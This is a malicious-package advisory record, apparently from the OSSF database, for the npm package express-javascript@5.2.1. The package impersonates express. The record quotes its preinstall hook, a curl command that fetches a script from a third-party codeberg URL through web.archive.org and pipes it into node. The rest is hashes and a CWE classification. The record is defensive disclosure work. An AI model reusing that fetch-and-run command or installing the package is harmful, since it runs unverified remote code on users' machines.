-= Per source details. Do not edit below this line.=-
express-javascript@5.2.1 impersonates the express package (copying its description, author, contributors, repository, homepage, and dependency list verbatim) while its package.json preinstall lifecycle hook runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from a third-party account unrelated to the express publisher via a web.archive.org wrapper on a mutable branch/main ref and piping it into node with no integrity check. Every npm install of this package executes whatever bytes that endpoint returns on the installer's machine.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020632",
"import_time": "2026-09-29T14:44:37.392432Z",
"modified_time": "2026-09-29T14:40:22Z",
"sha256": "73e4909976d37fb7fb7dd30012d82bd882608df20716a824f1dc0efa074b5401",
"source": "amazon-inspector",
"versions": [
"5.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "802b379278fac7220d1cfe63545dbd2e20afa28c34d344edb000cb18a0d1c620",
"tlsh": "1f51ba21cc4e8c6326c5a2dd3c69a542612188078e41f81cf759539c8f8e56f71b9fbe"
}
],
"package_integrity": [
{
"filename": "express-javascript-5.2.1.tgz",
"hashes": {
"sha1": "befd8fdeba66846025490e7869147804c88375e9",
"sha512_sri": "sha512-wpNV2u4N2loxL3yEpirCoQNlNK0QIpUizwMfJU3bOL9o3oIlYTRuT7+oNDTag6wKGV3bHqfe6jiTnSH51la3nA=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-javascript/MAL-2026-17242.json"